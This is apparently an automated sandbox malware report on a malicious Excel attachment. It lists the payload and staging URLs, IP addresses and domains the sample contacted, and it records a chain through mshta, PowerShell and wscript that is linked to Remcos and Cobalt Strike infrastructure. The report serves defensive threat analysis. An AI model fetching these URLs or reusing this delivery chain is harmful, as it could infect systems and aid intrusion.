        http://23.95.235.29/90/verynicebeautifulpictueforentirelifekidsgivenmebackwithnew.tIFY0%Avira URL Cloudsafe
        https://jktc.pro/1.a2M0%Avira URL Cloudsafe
        http://go.cr0%Avira URL Cloudsafe
        http://23.95.235.29/90/wcc/greatattitudewithnicefeatruewithgreatnicecreamypurplethingsgood.hta0%Avira URL Cloudsafe
        http://23.95.235.29/90/wcc/greatattitudewithnicefeatruewithgreatnicecreamypurplethingsgood.htaC:0%Avira URL Cloudsafe
        http://23.95.235.29/L9a2M0%Avira URL Cloudsafe
        http://23.95.235.29/90/verynicebeautifulpictueforentirelifekidsgivenmebackwithnew.tIFm.dll0%Avira URL Cloudsafe
        http://23.95.235.29/90/wcc/greatattitudewithnicefeatruewithgreatnicecreamypurplethingsgood.htareen&t0%Avira URL Cloudsafe
        NameIPActiveMaliciousAntivirus DetectionReputation
        paste.ee
        188.114.96.6
        truefalse
          high
          cloudinary.map.fastly.net
          151.101.1.137
          truefalse
            high
            jktc.pro
            104.21.34.183
            truefalse
              high
              res.cloudinary.com
              unknown
              unknownfalse
                high
                NameMaliciousAntivirus DetectionReputation
                https://jktc.pro/94W72u?&deficit=exultant&breath=willing&analyst=luxuriant&plot=ethereal&eggplant=green&teafalse
                • Avira URL Cloud: safe
                unknown
                http://23.95.235.29/90/verynicebeautifulpictueforentirelifekidsgivenmebackwithnew.tIFtrue
                • Avira URL Cloud: safe
                unknown
                http://23.95.235.29/90/wcc/greatattitudewithnicefeatruewithgreatnicecreamypurplethingsgood.htatrue
                • Avira URL Cloud: safe
                unknown
                https://res.cloudinary.com/dytflt61n/image/upload/v1733134947/bklpyseyeut4impw50n1.jpgfalse
                  high
                  NameSourceMaliciousAntivirus DetectionReputation
                  http://23.95.235.29/90/wcc/greatattitudewithnicefeatruewithgreatnicecreamypurplethingsgood.htahttp:/mshta.exe, 00000004.00000003.436483754.0000000002575000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 0000000F.00000003.482272011.0000000002E85000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 0000000F.00000003.486809620.0000000002E85000.00000004.00000800.00020000.00000000.sdmpfalse
                  • Avira URL Cloud: safe
                  unknown
                  http://23.95.235.29/omshta.exe, 00000004.00000002.440480058.0000000002C18000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.435988921.0000000002C18000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.435556244.0000000002C18000.00000004.00000020.00020000.00000000.sdmpfalse
                  • Avira URL Cloud: safe
                  unknown
                  http://nuget.org/NuGet.exepowershell.exe, 00000007.00000002.464145713.0000000012561000.00000004.00000800.00020000.00000000.sdmpfalse
                    high
                    http://crl.entrust.net/server1.crl0mshta.exe, 00000004.00000003.435988921.0000000002BD0000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.440480058.0000000002BD0000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.435556244.0000000002BCC000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.465465325.000000001C3C3000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000002.490239809.0000000003E03000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000003.487428731.0000000003E03000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000003.482734018.0000000003E02000.00000004.00000020.00020000.00000000.sdmpfalse
                      high
                      http://ocsp.entrust.net03mshta.exe, 00000004.00000003.435988921.0000000002BD0000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.440480058.0000000002BD0000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.435556244.0000000002BCC000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.465465325.000000001C3C3000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000002.490239809.0000000003E03000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000003.487428731.0000000003E03000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000003.482734018.0000000003E02000.00000004.00000020.00020000.00000000.sdmpfalse
                        high
                        https://res.cloudinary.com/dytflt61n/image/upload/v1733134947/bklpyseyeut4impw50n1.jpgXpowershell.exe, 0000000D.00000002.518019597.00000000024A2000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000018.00000002.549469905.0000000002412000.00000004.00000800.00020000.00000000.sdmpfalse
                          high
                          http://23.95.235.29/90/wcc/greatattitudewithnicefeatruewithgreatnicecreamypurplethingsgood.hta...mshta.exe, 00000004.00000003.434479190.000000000044E000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000002.488436254.000000000031F000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000003.487377739.000000000031E000.00000004.00000020.00020000.00000000.sdmpfalse
                          • Avira URL Cloud: safe
                          unknown
                          https://jktc.pro/94W72u?&deficit=exultant&breath=willing&analyst=luxuriant&plot=ethereal&eggplant=grmshta.exe, 0000000F.00000002.488436254.00000000002FB000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000003.487377739.000000000031E000.00000004.00000020.00020000.00000000.sdmp, Euro confirmation Sp.xls, ~DF634BD35CC9B94982.TMP.0.drfalse
                          • Avira URL Cloud: safe
                          unknown
                          https://contoso.com/Licensepowershell.exe, 00000007.00000002.464145713.0000000012561000.00000004.00000800.00020000.00000000.sdmpfalse
                            high
                            https://contoso.com/Iconpowershell.exe, 00000007.00000002.464145713.0000000012561000.00000004.00000800.00020000.00000000.sdmpfalse
                              high
                              http://23.95.235.29/90/wcc/greatattitudewithnicefeatruewithgreatnicecreamypurplethingsgood.hta...unmshta.exe, 0000000F.00000002.488436254.000000000031F000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000003.487377739.000000000031E000.00000004.00000020.00020000.00000000.sdmpfalse
                              • Avira URL Cloud: safe
                              unknown
                              http://23.95.235.29/90/wcc/greatattitudewithnicefeatruewithgreatnicecreamypurplethingsgood.hta...smshta.exe, 00000004.00000003.434479190.000000000044E000.00000004.00000020.00020000.00000000.sdmpfalse
                              • Avira URL Cloud: safe
                              unknown
                              http://crl.pkioverheid.nl/DomOrganisatieLatestCRL-G2.crl0mshta.exe, 00000004.00000003.435988921.0000000002BD0000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.440480058.0000000002BD0000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.435556244.0000000002BCC000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.465465325.000000001C3C3000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000002.490239809.0000000003E03000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000003.487428731.0000000003E03000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000003.482734018.0000000003E02000.00000004.00000020.00020000.00000000.sdmpfalse
                                high
                                http://www.diginotar.nl/cps/pkioverheid0mshta.exe, 00000004.00000003.435988921.0000000002BD0000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.440480058.0000000002BD0000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.435556244.0000000002BCC000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.465465325.000000001C3C3000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000002.490239809.0000000003E03000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000003.487428731.0000000003E03000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000003.482734018.0000000003E02000.00000004.00000020.00020000.00000000.sdmpfalse
                                  high
                                  https://jktc.pro/5mshta.exe, 00000004.00000003.437054940.00000000004B2000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.440382828.00000000004B2000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.434479190.00000000004B2000.00000004.00000020.00020000.00000000.sdmpfalse
                                  • Avira URL Cloud: safe
                                  unknown
                                  https://jktc.pro/:mshta.exe, 00000004.00000003.437054940.00000000004B2000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.440382828.00000000004B2000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.434479190.00000000004B2000.00000004.00000020.00020000.00000000.sdmpfalse
                                  • Avira URL Cloud: safe
                                  unknown
                                  http://go.microspowershell.exe, 00000007.00000002.458485050.0000000002A55000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000013.00000002.494624441.00000000025A3000.00000004.00000800.00020000.00000000.sdmpfalse
                                    high
                                    http://crl.usertrumshta.exe, 0000000F.00000003.487428731.0000000003E37000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000002.490239809.0000000003E37000.00000004.00000020.00020000.00000000.sdmpfalse
                                    • Avira URL Cloud: safe
                                    unknown
                                    http://23.95.235.29/90/verynicebeautifulpictueforentirelifekidsgivenmebackwithnew.tIFm.dll-powershell.exe, 00000007.00000002.457796037.0000000000441000.00000004.00000020.00020000.00000000.sdmpfalse
                                    • Avira URL Cloud: safe
                                    unknown
                                    http://23.95.235.29/90/verynicebeautifulpictueforentirelifekidsgivenmebackwithnew.tIFppowershell.exe, 00000007.00000002.458485050.0000000002A55000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000013.00000002.494624441.00000000025A3000.00000004.00000800.00020000.00000000.sdmpfalse
                                    • Avira URL Cloud: safe
                                    unknown
                                    http://crl.pkioverheid.nl/DomOvLatestCRL.crl0mshta.exe, 00000004.00000003.435988921.0000000002BD0000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.440480058.0000000002BD0000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.435556244.0000000002BCC000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.465465325.000000001C3C3000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000002.490239809.0000000003E03000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000003.487428731.0000000003E03000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000003.482734018.0000000003E02000.00000004.00000020.00020000.00000000.sdmpfalse
                                      high
                                      https://res.cloudinary.compowershell.exe, 0000000D.00000002.518019597.00000000024A2000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000018.00000002.549469905.0000000002412000.00000004.00000800.00020000.00000000.sdmpfalse
                                        high
                                        http://23.95.235.29/90/verynicebpowershell.exe, 00000007.00000002.458485050.0000000002A55000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000013.00000002.494624441.00000000025A3000.00000004.00000800.00020000.00000000.sdmpfalse
                                        • Avira URL Cloud: safe
                                        unknown
                                        http://23.95.235.29/90/wcc/greatattitudewithnicefeatruewithgreatnicecreamypurplethingsgood.htant=gremshta.exe, 00000004.00000002.440382828.000000000044E000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000002.488436254.000000000031F000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000003.487377739.000000000031E000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000002.488436254.00000000002CE000.00000004.00000020.00020000.00000000.sdmpfalse
                                        • Avira URL Cloud: safe
                                        unknown
                                        https://jktc.pro/mshta.exe, 00000004.00000003.435988921.0000000002BD0000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.440480058.0000000002BD0000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.435556244.0000000002BCC000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000002.488436254.0000000000331000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000003.487377739.0000000000331000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000003.487428731.0000000003E37000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000002.490239809.0000000003E37000.00000004.00000020.00020000.00000000.sdmpfalse
                                        • Avira URL Cloud: safe
                                        unknown
                                        https://contoso.com/powershell.exe, 00000007.00000002.464145713.0000000012561000.00000004.00000800.00020000.00000000.sdmpfalse
                                          high
                                          https://nuget.org/nuget.exepowershell.exe, 00000007.00000002.464145713.0000000012561000.00000004.00000800.00020000.00000000.sdmpfalse
                                            high
                                            http://23.95.235.29/mshta.exe, 00000004.00000002.440480058.0000000002C18000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.435988921.0000000002C18000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.435556244.0000000002C18000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000003.487428731.0000000003E4C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000002.490239809.0000000003E4C000.00000004.00000020.00020000.00000000.sdmpfalse
                                            • Avira URL Cloud: safe
                                            unknown
                                            http://23.95.235.29/90/verynicebeautifulpictueforentirelifekidsgivenmebackwithnew.tIFC:powershell.exe, 00000007.00000002.465103812.000000001A950000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000013.00000002.501446236.000000001AD84000.00000004.00000020.00020000.00000000.sdmpfalse
                                            • Avira URL Cloud: safe
                                            unknown
                                            http://23.95.235.29/90/verynicebeautifulpictueforentirelifekidsgivenmebackwithnew.tIFYpowershell.exe, 00000007.00000002.457796037.0000000000441000.00000004.00000020.00020000.00000000.sdmpfalse
                                            • Avira URL Cloud: safe
                                            unknown
                                            https://jktc.pro/1.a2Mmshta.exe, 0000000F.00000003.487428731.0000000003E37000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000002.490239809.0000000003E37000.00000004.00000020.00020000.00000000.sdmpfalse
                                            • Avira URL Cloud: safe
                                            unknown
                                            http://23.95.235.29/L9a2Mmshta.exe, 0000000F.00000003.487428731.0000000003E4C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000002.490239809.0000000003E4C000.00000004.00000020.00020000.00000000.sdmpfalse
                                            • Avira URL Cloud: safe
                                            unknown
                                            http://23.95.235.29/90/wcc/greatattitudewithnicefeatruewithgreatnicecreamypurplethingsgood.htaC:mshta.exe, 00000004.00000002.440480058.0000000002C18000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.435988921.0000000002C18000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.435556244.0000000002C18000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000002.488436254.0000000000331000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000003.487377739.0000000000331000.00000004.00000020.00020000.00000000.sdmpfalse
                                            • Avira URL Cloud: safe
                                            unknown
                                            http://ocsp.entrust.net0Dmshta.exe, 00000004.00000003.435988921.0000000002BD0000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.440480058.0000000002BD0000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.435556244.0000000002BCC000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.465465325.000000001C3C3000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000002.490239809.0000000003E03000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000003.487428731.0000000003E03000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000003.482734018.0000000003E02000.00000004.00000020.00020000.00000000.sdmpfalse
                                              high
                                              http://schemas.xmlsoap.org/ws/2005/05/identity/claims/namepowershell.exe, 00000007.00000002.458485050.0000000002531000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000D.00000002.518019597.00000000022A1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000013.00000002.494624441.00000000023BC000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000018.00000002.549469905.0000000002211000.00000004.00000800.00020000.00000000.sdmpfalse
                                                high
                                                https://secure.comodo.com/CPS0mshta.exe, 00000004.00000003.435988921.0000000002BD0000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.440480058.0000000002BD0000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.435556244.0000000002BCC000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.465465325.000000001C3C3000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.465465325.000000001C360000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000002.490239809.0000000003E03000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000003.487428731.0000000003E03000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000003.482734018.0000000003E02000.00000004.00000020.00020000.00000000.sdmpfalse
                                                  high
                                                  http://crl.entrust.net/2048ca.crl0mshta.exe, 00000004.00000003.435988921.0000000002BD0000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.440480058.0000000002BD0000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.435556244.0000000002BCC000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.465465325.000000001C3C3000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000002.490239809.0000000003E03000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000003.487428731.0000000003E03000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000003.482734018.0000000003E02000.00000004.00000020.00020000.00000000.sdmpfalse
                                                    high
                                                    http://go.crpowershell.exe, 00000007.00000002.465465325.000000001C4A6000.00000004.00000020.00020000.00000000.sdmpfalse
                                                    • Avira URL Cloud: safe
                                                    unknown
                                                    http://23.95.235.29/90/verynicebeautifulpictueforentirelifekidsgivenmebackwithnew.tIFm.dllpowershell.exe, 00000013.00000002.494069922.000000000041F000.00000004.00000020.00020000.00000000.sdmpfalse
                                                    • Avira URL Cloud: safe
                                                    unknown
                                                    http://23.95.235.29/90/wcc/greatattitudewithnicefeatruewithgreatnicecreamypurplethingsgood.htareen&tmshta.exe, 00000004.00000003.434479190.00000000004B2000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000002.488436254.0000000000331000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000003.487377739.0000000000331000.00000004.00000020.00020000.00000000.sdmpfalse
                                                    • Avira URL Cloud: safe
                                                    unknown
                                                    • No. of IPs < 25%
                                                    • 25% < No. of IPs < 50%
                                                    • 50% < No. of IPs < 75%
                                                    • 75% < No. of IPs
                                                    IPDomainCountryFlagASNASN NameMalicious
                                                    23.95.235.29
                                                    unknownUnited States
                                                    36352AS-COLOCROSSINGUStrue
                                                    151.101.1.137
                                                    cloudinary.map.fastly.netUnited States
                                                    54113FASTLYUSfalse
                                                    172.67.163.184
                                                    unknownUnited States
                                                    13335CLOUDFLARENETUSfalse
                                                    104.21.34.183
                                                    jktc.proUnited States
                                                    13335CLOUDFLARENETUSfalse
                                                    151.101.65.137
                                                    unknownUnited States
                                                    54113FASTLYUStrue
                                                    Joe Sandbox version:41.0.0 Charoite
                                                    Analysis ID:1574071
                                                    Start date and time:2024-12-12 21:36:49 +01:00
                                                    Joe Sandbox product:CloudBasic
                                                    Overall analysis duration:0h 7m 30s
                                                    Hypervisor based Inspection enabled:false
                                                    Report type:full
                                                    Cookbook file name:defaultwindowsofficecookbook.jbs
                                                    Analysis system description:Windows 7 x64 SP1 with Office 2010 SP1 (IE 11, FF52, Chrome 57, Adobe Reader DC 15, Flash 25.0.0.127, Java 8 Update 121, .NET 4.6.2)
                                                    Number of analysed new started processes analysed:27
                                                    Number of new started drivers analysed:0
                                                    Number of existing processes analysed:0
                                                    Number of existing drivers analysed:0
                                                    Number of injected processes analysed:0
                                                    Technologies:
                                                    • HCA enabled
                                                    • EGA enabled
                                                    • GSI enabled (VBA)
                                                    • AMSI enabled
                                                    Analysis Mode:default
                                                    Sample name:Euro confirmation Sp.xls
                                                    Detection:MAL
                                                    Classification:mal100.phis.troj.expl.evad.winXLS@29/38@23/5
                                                    EGA Information:
                                                    • Successful, ratio: 33.3%
                                                    HCA Information:
                                                    • Successful, ratio: 100%
                                                    • Number of executed functions: 10
                                                    • Number of non-executed functions: 3
                                                    Cookbook Comments:
                                                    • Found application associated with file extension: .xls
                                                    • Changed system and user locale, location and keyboard layout to French - France
                                                    • Found Word or Excel or PowerPoint or XPS Viewer
                                                    • Attach to Office via COM
                                                    • Active ActiveX Object
                                                    • Active ActiveX Object
                                                    • Active ActiveX Object
                                                    • Active ActiveX Object
                                                    • Scroll down
                                                    • Close Viewer
                                                    • Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, conhost.exe, svchost.exe
                                                    • Excluded IPs from analysis (whitelisted): 104.17.202.1, 104.17.201.1
                                                    • Excluded domains from analysis (whitelisted): resc.cloudinary.com.cdn.cloudflare.net
                                                    • Execution Graph export aborted for target mshta.exe, PID 2692 because there are no executed function
                                                    • Execution Graph export aborted for target mshta.exe, PID 3880 because there are no executed function
                                                    • Not all processes where analyzed, report is missing behavior information
                                                    • Report size exceeded maximum capacity and may have missing behavior information.
                                                    • Report size getting too big, too many NtOpenKeyEx calls found.
                                                    • Report size getting too big, too many NtQueryValueKey calls found.
                                                    • Some HTTP raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                                                    • Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                                                    • VT rate limit hit for: Euro confirmation Sp.xls
                                                    TimeTypeDescription
                                                    15:38:13API Interceptor135x Sleep call for process: mshta.exe modified
                                                    15:38:19API Interceptor225x Sleep call for process: powershell.exe modified
                                                    15:38:29API Interceptor23x Sleep call for process: wscript.exe modified
                                                    MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                    23.95.235.29nicewithgreatfeaturesreturnformebestthingsgivensoofar.htaGet hashmaliciousCobalt Strike, RemcosBrowse
                                                    • 23.95.235.29/808/verynicecreamychickenfvouratedishesforeveryonewhoinonlinewith.tIF
                                                    invoice09850.xlsGet hashmaliciousRemcosBrowse
                                                    • 23.95.235.29/808/kcc/nicewithgreatfeaturesreturnformebestthingsgivensoofar.hta
                                                    Invoice A037.xlsGet hashmaliciousUnknownBrowse
                                                    • 23.95.235.29/808/kcc/nicewithgreatfeaturesreturnformebestthingsgivensoofar.hta
                                                    151.101.1.137stage2.ps1Get hashmaliciousPureLog Stealer, RevengeRAT, zgRATBrowse
                                                      nicegirlforyou.htaGet hashmaliciousCobalt Strike, RemcosBrowse
                                                        Invoice A037.xlsGet hashmaliciousUnknownBrowse
                                                          Orden_de_Compra_Nmero_6782929219.xlsGet hashmaliciousHTMLPhisherBrowse
                                                            Aktarma,pdf.vbsGet hashmaliciousRemcosBrowse
                                                              16547.jsGet hashmaliciousMassLogger RATBrowse
                                                                #U041f#U043b#U0430#U0449#U0430#U043d#U0435.docxGet hashmaliciousRemcosBrowse
                                                                  nr101612_Order.wsfGet hashmaliciousRemcosBrowse
                                                                    1013911.jsGet hashmaliciousFormBookBrowse
                                                                      http://itsecurityupdate.comGet hashmaliciousUnknownBrowse
                                                                        172.67.163.1844lXTg8P7Ih.elfGet hashmaliciousMiraiBrowse
                                                                        • /tmUnblock.cgi
                                                                        MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                        cloudinary.map.fastly.netstage2.ps1Get hashmaliciousPureLog Stealer, RevengeRAT, zgRATBrowse
                                                                        • 151.101.193.137
                                                                        nicegirlforyou.htaGet hashmaliciousCobalt Strike, RemcosBrowse
                                                                        • 151.101.1.137
                                                                        invoice09850.xlsGet hashmaliciousRemcosBrowse
                                                                        • 151.101.65.137
                                                                        Invoice A037.xlsGet hashmaliciousUnknownBrowse
                                                                        • 151.101.1.137
                                                                        Plugin81139.jsGet hashmaliciousPureLog Stealer, RevengeRAT, zgRATBrowse
                                                                        • 151.101.129.137
                                                                        PO-8776-2024.jsGet hashmaliciousRemcosBrowse
                                                                        • 151.101.129.137
                                                                        New Order Enquiry.jsGet hashmaliciousAgentTeslaBrowse
                                                                        • 151.101.193.137
                                                                        NESTLE_MEXICO_Purchase_Order_10122024.xlsGet hashmaliciousUnknownBrowse
                                                                        • 151.101.65.137
                                                                        Orden_de_Compra_Nmero_6782929219.xlsGet hashmaliciousHTMLPhisherBrowse
                                                                        • 151.101.65.137
                                                                        Aktarma,pdf.vbsGet hashmaliciousRemcosBrowse
                                                                        • 151.101.1.137
                                                                        jktc.pro510005940.docx.docGet hashmaliciousUnknownBrowse
                                                                        • 104.21.34.183
                                                                        510005940.docx.docGet hashmaliciousUnknownBrowse
                                                                        • 172.67.163.184
                                                                        paste.eeprint preview.jsGet hashmaliciousFormBookBrowse
                                                                        • 172.67.187.200
                                                                        nicegirlforyou.htaGet hashmaliciousCobalt Strike, RemcosBrowse
                                                                        • 104.21.84.67
                                                                        nicewithgreatfeaturesreturnformebestthingsgivensoofar.htaGet hashmaliciousCobalt Strike, RemcosBrowse
                                                                        • 104.21.84.67
                                                                        invoice09850.xlsGet hashmaliciousRemcosBrowse
                                                                        • 188.114.97.6
                                                                        Invoice A037.xlsGet hashmaliciousUnknownBrowse
                                                                        • 188.114.97.6
                                                                        PO-8776-2024.jsGet hashmaliciousRemcosBrowse
                                                                        • 104.21.84.67
                                                                        NESTLE_MEXICO_Purchase_Order_10122024.xlsGet hashmaliciousUnknownBrowse
                                                                        • 188.114.97.6
                                                                        matchingwithbestthingstobegreatforentirelifegivenmebestthignsevergive.htaGet hashmaliciousCobalt Strike, Remcos, HTMLPhisherBrowse
                                                                        • 104.21.84.67
                                                                        Orden_de_Compra_Nmero_6782929219.xlsGet hashmaliciousHTMLPhisherBrowse
                                                                        • 188.114.96.6
                                                                        Aktarma,pdf.vbsGet hashmaliciousRemcosBrowse
                                                                        • 172.67.187.200
                                                                        MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                        FASTLYUSfile.exeGet hashmaliciousCredential FlusherBrowse
                                                                        • 151.101.129.91
                                                                        file.exeGet hashmaliciousCredential FlusherBrowse
                                                                        • 151.101.129.91
                                                                        https://es-proposal.webflow.io/Get hashmaliciousHTMLPhisherBrowse
                                                                        • 151.101.194.137
                                                                        file.exeGet hashmaliciousCredential FlusherBrowse
                                                                        • 151.101.65.91
                                                                        file.exeGet hashmaliciousCredential FlusherBrowse
                                                                        • 151.101.65.91
                                                                        file.exeGet hashmaliciousAmadey, Credential Flusher, Stealc, VidarBrowse
                                                                        • 151.101.193.91
                                                                        https://morgans-proposal-site.webflow.io/Get hashmaliciousCaptcha Phish, HTMLPhisherBrowse
                                                                        • 151.101.66.137
                                                                        file.exeGet hashmaliciousCredential FlusherBrowse
                                                                        • 151.101.1.91
                                                                        file.exeGet hashmaliciousCredential FlusherBrowse
                                                                        • 151.101.193.91
                                                                        https://Scotts2fa.solitran.ru/JtZiK3LK/#Dmark.ochs@scotts.comGet hashmaliciousUnknownBrowse
                                                                        • 151.101.194.137
                                                                        CLOUDFLARENETUSWO-663071 Sabiya Power Station Project.vbsGet hashmaliciousRemcosBrowse
                                                                        • 162.159.129.233
                                                                        ltT8eZaqtZ.exeGet hashmaliciousLummaC Stealer, PureLog StealerBrowse
                                                                        • 172.67.216.167
                                                                        htZgRRla8S.exeGet hashmaliciousLummaC StealerBrowse
                                                                        • 172.67.206.64
                                                                        0TGy7VIqx7CSab5o.lNK.lnkGet hashmaliciousUnknownBrowse
                                                                        • 172.67.185.252
                                                                        https://es-proposal.webflow.io/Get hashmaliciousHTMLPhisherBrowse
                                                                        • 104.21.112.1
                                                                        http://ebaumsworld.comGet hashmaliciousUnknownBrowse
                                                                        • 104.17.159.113
                                                                        https://mavenclinic.quatrix.itGet hashmaliciousUnknownBrowse
                                                                        • 104.18.20.58
                                                                        http://mavenclinic.quatrix.itGet hashmaliciousUnknownBrowse
                                                                        • 104.18.21.58
                                                                        https://morgans-proposal-site.webflow.io/Get hashmaliciousCaptcha Phish, HTMLPhisherBrowse
                                                                        • 172.64.151.8
                                                                        https://Scotts2fa.solitran.ru/JtZiK3LK/#Dmark.ochs@scotts.comGet hashmaliciousUnknownBrowse
                                                                        • 104.17.25.14
                                                                        AS-COLOCROSSINGUSSwiftCopy_PaymtRecpt121224.exeGet hashmaliciousRemcosBrowse
                                                                        • 192.210.150.17
                                                                        Document.xlaGet hashmaliciousUnknownBrowse
                                                                        • 107.172.44.175
                                                                        Document.xlaGet hashmaliciousUnknownBrowse
                                                                        • 107.172.44.175
                                                                        Document.xlaGet hashmaliciousUnknownBrowse
                                                                        • 107.172.44.175
                                                                        Document.xlaGet hashmaliciousUnknownBrowse
                                                                        • 107.172.44.175
                                                                        nicegirlforyou.htaGet hashmaliciousCobalt Strike, RemcosBrowse
                                                                        • 172.245.142.60
                                                                        nicewithgreatfeaturesreturnformebestthingsgivensoofar.htaGet hashmaliciousCobalt Strike, RemcosBrowse
                                                                        • 192.3.101.149
                                                                        invoice09850.xlsGet hashmaliciousRemcosBrowse
                                                                        • 192.3.101.149
                                                                        Document.xla.xlsxGet hashmaliciousUnknownBrowse
                                                                        • 107.172.44.175
                                                                        Invoice A037.xlsGet hashmaliciousUnknownBrowse
                                                                        • 23.95.235.29
                                                                        CLOUDFLARENETUSWO-663071 Sabiya Power Station Project.vbsGet hashmaliciousRemcosBrowse
                                                                        • 162.159.129.233
                                                                        ltT8eZaqtZ.exeGet hashmaliciousLummaC Stealer, PureLog StealerBrowse
